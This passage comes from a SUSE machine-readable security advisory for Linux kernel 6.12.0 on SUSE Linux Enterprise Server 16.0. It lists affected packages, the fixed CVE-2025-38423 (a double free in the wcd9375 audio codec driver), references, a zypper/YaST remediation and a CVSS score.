"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd9375: Fix double free of regulator supplies\n\nDriver gets regulator supplies in probe path with\ndevm_regulator_bulk_get(), so should not call regulator_bulk_free() in\nerror and remove paths to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38423",
"url": "https://www.suse.com/security/cve/CVE-2025-38423"
},
{
"category": "external",
"summary": "SUSE Bug 1247292 for CVE-2025-38423",
"url": "https://bugzilla.suse.com/1247292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
